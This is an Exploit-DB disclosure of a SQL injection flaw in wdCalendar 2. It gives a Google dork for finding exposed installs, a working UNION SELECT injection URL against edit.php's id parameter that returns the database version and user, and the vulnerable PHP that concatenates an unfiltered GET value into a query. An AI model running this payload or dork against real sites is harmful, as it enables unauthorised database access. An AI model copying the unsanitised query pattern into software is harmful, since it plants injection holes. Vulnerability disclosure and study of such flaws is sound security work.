wdCalendar 2 - SQL Injection

EDB-ID:

40364

CVE:

N/A




Platform:

PHP

Date:

2016-09-13


# Exploit Title: wdcalendar version 2 sql injection vulnerability
# Google Dork: allinurl:"wdcalendar/edit.php"
# Date: 12/09/2016
# Exploit Author: Alfonso Castillo Angel
# Software Link: https://github.com/ronisaha/wdCalendar
# Version: Version 2
# Tested on: Windows 7 ultimate
# Category: webapps

 * Affected file -> edit.php and edit.db.php
 * Exploit ->
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--


 * Vulnerable code:

 function getCalendarByRange($id){
  try{
    $db = new DBConnection();
    $db->getConnection();
    $sql = "select * from `jqcalendar` where `id` = " . $id;  //the
variable is not filtered properly
    $handle = mysql_query($sql);
    //echo $sql;
    $row = mysql_fetch_object($handle);
}catch(Exception $e){
  }
  return $row;
}
if($_GET["id"]){
  $event = getCalendarByRange($_GET["id"]); //the variable is not filtered
properly